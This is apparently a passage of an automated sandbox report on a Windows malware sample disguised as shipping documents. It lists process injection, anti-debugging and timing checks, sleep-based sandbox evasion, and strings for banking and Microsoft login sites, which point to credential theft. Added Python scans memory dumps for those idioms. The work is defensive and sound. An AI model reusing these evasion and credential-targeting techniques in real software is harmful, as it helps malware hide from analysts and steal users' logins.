Source: Binary string: waitfor.pdbGCTL | source: svchost.exe, 00000002.00000003.2214923120.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, pNkvbgLNQpIoyz.exe, 00000003.00000002.4472898129.0000000001498000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: waitfor.pdb | source: svchost.exe, 00000002.00000003.2214923120.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, pNkvbgLNQpIoyz.exe, 00000003.00000002.4472898129.0000000001498000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: pNkvbgLNQpIoyz.exe, 00000003.00000000.2170370235.0000000000F6E000.00000002.00000001.01000000.00000004.sdmp, pNkvbgLNQpIoyz.exe, 00000006.00000002.4473119648.0000000000F6E000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: wntdll.pdbUGP | source: SHIPPING DOCUMENTS_PDF.exe, 00000000.00000003.2030202293.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, SHIPPING DOCUMENTS_PDF.exe, 00000000.00000003.2029703617.0000000003530000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2152549878.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2153950004.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2248912135.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2248912135.000000000319E000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2248057916.00000000048C9000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2250042141.0000000004A7A000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4473547371.0000000004C20000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4473547371.0000000004DBE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: SHIPPING DOCUMENTS_PDF.exe, 00000000.00000003.2030202293.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, SHIPPING DOCUMENTS_PDF.exe, 00000000.00000003.2029703617.0000000003530000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2152549878.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2153950004.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2248912135.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2248912135.000000000319E000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, waitfor.exe, 00000005.00000003.2248057916.00000000048C9000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2250042141.0000000004A7A000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4473547371.0000000004C20000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4473547371.0000000004DBE000.00000040.00001000.00020000.00000000.sdmp
                Source: SHIPPING DOCUMENTS_PDF.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: SHIPPING DOCUMENTS_PDF.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: SHIPPING DOCUMENTS_PDF.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: SHIPPING DOCUMENTS_PDF.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: SHIPPING DOCUMENTS_PDF.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe Code function: 0_2_00B54B37 LoadLibraryA,GetProcAddress,0_2_00B54B37
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe Code function: 0_2_00B78945 push ecx; ret 0_2_00B78958
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004CA027 push eax; retf 2_2_004CA028
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004C8A2C push ecx; ret 2_2_004C8A59
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004C8A33 push ecx; ret 2_2_004C8A59
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004C8286 push 7AE781A2h; iretd 2_2_004C82AA
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004BAB95 push es; retf 2_2_004BAB99
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004BBCE8 push ecx; ret 2_2_004BBCEF
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004B3480 push eax; ret 2_2_004B3482
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004BE5F4 push FFFFFF8Ah; iretd 2_2_004BE5FF
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004C7EB7 push esi; iretd 2_2_004C7EC0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004D4F63 push edi; retf 2_2_004D4F6E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0300225F pushad ; ret 2_2_030027F9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030027FA pushad ; ret 2_2_030027F9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030309AD push ecx; mov dword ptr [esp], ecx 2_2_030309B6
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0300283D push eax; iretd 2_2_03002858
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0300135E push eax; iretd 2_2_03001369
                Source: C:\Windows\SysWOW64\waitfor.exe Code function: 5_2_04C227FA pushad ; ret 5_2_04C227F9
                Source: C:\Windows\SysWOW64\waitfor.exe Code function: 5_2_04C2225F pushad ; ret 5_2_04C227F9
                Source: C:\Windows\SysWOW64\waitfor.exe Code function: 5_2_04C2283D push eax; iretd 5_2_04C22858
                Source: C:\Windows\SysWOW64\waitfor.exe Code function: 5_2_04C509AD push ecx; mov dword ptr [esp], ecx 5_2_04C509B6
                Source: C:\Windows\SysWOW64\waitfor.exe Code function: 5_2_04C21200 push edx; retn 0004h 5_2_04C21206
                Source: C:\Windows\SysWOW64\waitfor.exe Code function: 5_2_04C218A7 push ds; ret 5_2_04C2198E
                Source: C:\Windows\SysWOW64\waitfor.exe Code function: 5_2_04C219DB push 262804D4h; ret 5_2_04C219EA
                Source: C:\Windows\SysWOW64\waitfor.exe Code function: 5_2_04C29939 push es; iretd 5_2_04C29940
                Source: C:\Windows\SysWOW64\waitfor.exe Code function: 5_2_02C7229F push ebp; retf 5_2_02C722A0
                Source: C:\Windows\SysWOW64\waitfor.exe Code function: 5_2_02C8020E push eax; retf 5_2_02C8020F
                Source: C:\Windows\SysWOW64\waitfor.exe Code function: 5_2_02C74A34 push esi; iretd 5_2_02C74A3D
                Source: C:\Windows\SysWOW64\waitfor.exe Code function: 5_2_02C76BA4 push eax; retf 5_2_02C76BA5
                Source: C:\Windows\SysWOW64\waitfor.exe Code function: 5_2_02C68865 push ecx; ret 5_2_02C6886C
                Source: C:\Windows\SysWOW64\waitfor.exe Code function: 5_2_02C74E03 push 7AE781A2h; iretd 5_2_02C74E27
                Source: C:\Windows\SysWOW64\waitfor.exe Code function: 5_2_02C75058 push 42629074h; iretd 5_2_02C75069
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe Code function: 0_2_00B548D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00B548D7
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe Code function: 0_2_00BD5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00BD5376
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B73187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00B73187
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\waitfor.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\waitfor.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\waitfor.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\waitfor.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\waitfor.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe API/Special instruction interceptor: Address: 9B3244
                Source: C:\Windows\SysWOW64\waitfor.exe API/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\waitfor.exe API/Special instruction interceptor: Address: 7FF8C88ED7E4
                Source: C:\Windows\SysWOW64\waitfor.exe API/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\waitfor.exe API/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\waitfor.exe API/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\waitfor.exe API/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\waitfor.exe API/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\waitfor.exe API/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0307096E rdtsc 2_2_0307096E
                Source: C:\Windows\SysWOW64\waitfor.exe Window / User API: threadDelayed 9842
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-105550
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe API coverage: 3.8 %
                Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\waitfor.exe API coverage: 2.6 %
                Source: C:\Windows\SysWOW64\waitfor.exe TID: 1784 Thread sleep count: 130 > 30
                Source: C:\Windows\SysWOW64\waitfor.exe TID: 1784 Thread sleep time: -260000s >= -30000s
                Source: C:\Windows\SysWOW64\waitfor.exe TID: 1784 Thread sleep count: 9842 > 30
                Source: C:\Windows\SysWOW64\waitfor.exe TID: 1784 Thread sleep time: -19684000s >= -30000s
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe TID: 3620 Thread sleep time: -60000s >= -30000s
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe TID: 3620 Thread sleep count: 31 > 30
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe TID: 3620 Thread sleep time: -46500s >= -30000s
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe TID: 3620 Thread sleep count: 33 > 30
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe TID: 3620 Thread sleep time: -33000s >= -30000s
                Source: C:\Windows\SysWOW64\waitfor.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\waitfor.exe Last function: Thread delayed
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe Code function: 0_2_00BB445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00BB445A
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe Code function: 0_2_00BBC6D1 FindFirstFileW,FindClose,0_2_00BBC6D1
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe Code function: 0_2_00BBC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00BBC75C
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe Code function: 0_2_00BBEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00BBEF95
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe Code function: 0_2_00BBF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00BBF0F2
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe Code function: 0_2_00BBF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00BBF3F3
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe Code function: 0_2_00BB37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00BB37EF
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe Code function: 0_2_00BB3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00BB3B12
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe Code function: 0_2_00BBBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00BBBCBC
                Source: C:\Windows\SysWOW64\waitfor.exe Code function: 5_2_02C7C290 FindFirstFileW,FindNextFileW,FindClose,5_2_02C7C290
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe Code function: 0_2_00B549A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00B549A0
                Source: B201338.5.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: B201338.5.dr Binary or memory string: discord.comVMware20,11696428655f
                Source: B201338.5.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: B201338.5.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: B201338.5.dr Binary or memory string: global block list test formVMware20,11696428655
                Source: B201338.5.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: B201338.5.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: B201338.5.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: B201338.5.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: B201338.5.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: B201338.5.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: B201338.5.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: B201338.5.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: B201338.5.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
                Source: B201338.5.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: waitfor.exe, 00000005.00000002.4472625168.0000000002EE5000.00000004.00000020.00020000.00000000.sdmp, pNkvbgLNQpIoyz.exe, 00000006.00000002.4472896426.0000000000BBF000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2536320747.000002490541C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: B201338.5.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: B201338.5.dr Binary or memory string: outlook.office.comVMware20,11696428655s
                Source: B201338.5.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: B201338.5.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: B201338.5.dr Binary or memory string: AMC password management pageVMware20,11696428655
                Source: B201338.5.dr Binary or memory string: tasks.office.comVMware20,11696428655o
                Source: B201338.5.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: B201338.5.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: B201338.5.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
                Source: B201338.5.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: B201338.5.dr Binary or memory string: dev.azure.comVMware20,11696428655j
                Source: B201338.5.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: B201338.5.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: B201338.5.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
                Source: B201338.5.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: B201338.5.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\waitfor.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0307096E rdtsc 2_2_0307096E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004C76A3 LdrLoadDll,2_2_004C76A3
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe Code function: 0_2_00BC3F09 BlockInput,0_2_00BC3F09
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe Code function: 0_2_00B53B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00B53B3A
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe Code function: 0_2_00B85A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00B85A7C
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe Code function: 0_2_00B54B37 LoadLibraryA,GetProcAddress,0_2_00B54B37
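                The `push ...; ret / retf / iretd` sequences, the `rdtsc` timing check and the `mov eax/ecx, dword ptr fs:[00000030h]` PEB reads that this report lists for the injected svchost.exe and waitfor.exe regions are all short, fixed byte sequences, so an analyst can triage a memory dump for them without a disassembler. The scanner below is an added example written for this page; it is not code from Joe Sandbox, from the report or from the sample. Its byte patterns are the IA-32 encodings of the mnemonics the report prints, and the input buffer is hand-assembled from those same mnemonics (a constructed sample, not bytes taken from SHIPPING DOCUMENTS_PDF.exe). The two-byte `push reg; ret` pairs also occur by chance in ordinary code and data, so the verdict requires several independent indicator classes to co-occur rather than alerting on one class alone.

```python
"""Byte-pattern triage for the anti-analysis idioms listed in this report.

Added example, not part of the Joe Sandbox report or of the analysed sample.
Run it over a raw dump of the injected code regions (offsets are file
offsets into the dump, not RVAs).
"""
from __future__ import annotations

import re
from collections import Counter

# Return family that closes each push gadget: ret (C3), retf (CB), iretd (CF),
# or ret imm16 (C2 iw) as in the report's 'push edx; retn 0004h'.
_RET = rb"(?:[\xC3\xCB\xCF]|\xC2..)"

PATTERNS = {
    # 64 = FS segment override; A1 = mov eax, moffs32; 8B 0D = mov ecx, [disp32].
    # fs:[30h] is the TEB field that points to the PEB (BeingDebugged, NtGlobalFlag),
    # i.e. the IsDebuggerPresent check done by hand.
    "peb_read": re.compile(rb"\x64(?:\xA1|\x8B\x0D)\x30\x00\x00\x00", re.DOTALL),
    # 0F 31 = rdtsc: cheap timing check against single-stepping and slow sandboxes.
    "rdtsc": re.compile(rb"\x0F\x31", re.DOTALL),
    # push imm32 (68 id) or push imm8 (6A ib) immediately followed by a return:
    # execution continues at the pushed constant, so a linear disassembly of the
    # bytes that follow is meaningless.
    "push_imm_ret": re.compile(rb"(?:\x68.{4}|\x6A.)" + _RET, re.DOTALL),
    # push r32 (50..57), push es (06), push ds (1E) or pushad (60), then a return.
    "push_reg_ret": re.compile(rb"[\x50-\x57\x06\x1E\x60]" + _RET, re.DOTALL),
}


def scan(buf: bytes) -> list[tuple[int, str, str]]:
    """Return (offset, category, hex bytes) for every match, sorted by offset."""
    hits = []
    for name, pat in PATTERNS.items():
        for m in pat.finditer(buf):
            hits.append((m.start(), name, m.group().hex()))
    return sorted(hits)


def summarize(buf: bytes) -> Counter:
    """Number of hits per indicator category."""
    return Counter(cat for _, cat, _ in scan(buf))


def is_suspicious(buf: bytes, min_categories: int = 3) -> bool:
    """Flag only when several independent indicator classes co-occur; a lone
    two-byte push/ret match is far too common in benign code to act on."""
    return len(summarize(buf)) >= min_categories


# Constructed sample: hand-assembled from the mnemonics the report lists.
# These are NOT bytes taken from the analysed sample.
SAMPLE = bytes.fromhex(
    "55 8B EC 83 EC 10"       # push ebp; mov ebp, esp; sub esp, 10h   (ordinary prologue)
    "64 A1 30 00 00 00"       # mov eax, dword ptr fs:[30h]           (PEB pointer)
    "8A 40 02"                # mov al, byte ptr [eax+2]              (PEB.BeingDebugged)
    "0F 31"                   # rdtsc
    "68 A2 81 E7 7A CF"       # push 7AE781A2h; iretd
    "6A 8A CF"                # push FFFFFF8Ah; iretd  (imm8 8Ah sign-extends to FFFFFF8Ah)
    "51 C3"                   # push ecx; ret
    "52 C2 04 00"             # push edx; retn 0004h
    "60 C3"                   # pushad; ret
    "06 CB"                   # push es; retf
    "64 8B 0D 30 00 00 00"    # mov ecx, dword ptr fs:[30h]
    "33 C0 C9 C3"             # xor eax, eax; leave; ret              (ordinary epilogue)
)

if __name__ == "__main__":
    for off, cat, hx in scan(SAMPLE):
        print(f"+0x{off:04x}  {cat:<13} {hx}")
    print(dict(summarize(SAMPLE)), "suspicious:", is_suspicious(SAMPLE))
```

                To use it on a real dump, replace `SAMPLE` with the bytes of the region (for example the `svchost.exe` range the report dumps as `00000002.00000002.2248912135.0000000003000000...`) and compare hit offsets against the `2_2_0300xxxx` / `2_2_03xxxxxx` function addresses above. Expect noise from the `push_reg_ret` class in any large buffer; the PEB read and `rdtsc` classes carry most of the signal.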
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe Code function: 0_2_009B34B0 mov eax, dword ptr fs:[00000030h] 0_2_009B34B0
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe Code function: 0_2_009B3510 mov eax, dword ptr fs:[00000030h] 0_2_009B3510
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe Code function: 0_2_009B1E70 mov eax, dword ptr fs:[00000030h] 0_2_009B1E70
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h] 2_2_0306A30B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h] 2_2_0306A30B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h] 2_2_0306A30B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302C310 mov ecx, dword ptr fs:[00000030h] 2_2_0302C310
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03050310 mov ecx, dword ptr fs:[00000030h] 2_2_03050310
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03108324 mov eax, dword ptr fs:[00000030h] 2_2_03108324
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03108324 mov ecx, dword ptr fs:[00000030h] 2_2_03108324
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03108324 mov eax, dword ptr fs:[00000030h] 2_2_03108324
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03108324 mov eax, dword ptr fs:[00000030h] 2_2_03108324
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h] 2_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h] 2_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h] 2_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B035C mov ecx, dword ptr fs:[00000030h] 2_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h] 2_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h] 2_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030FA352 mov eax, dword ptr fs:[00000030h] 2_2_030FA352
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D8350 mov ecx, dword ptr fs:[00000030h] 2_2_030D8350
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0310634F mov eax, dword ptr fs:[00000030h] 2_2_0310634F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D437C mov eax, dword ptr fs:[00000030h] 2_2_030D437C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h] 2_2_0302E388
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h] 2_2_0302E388
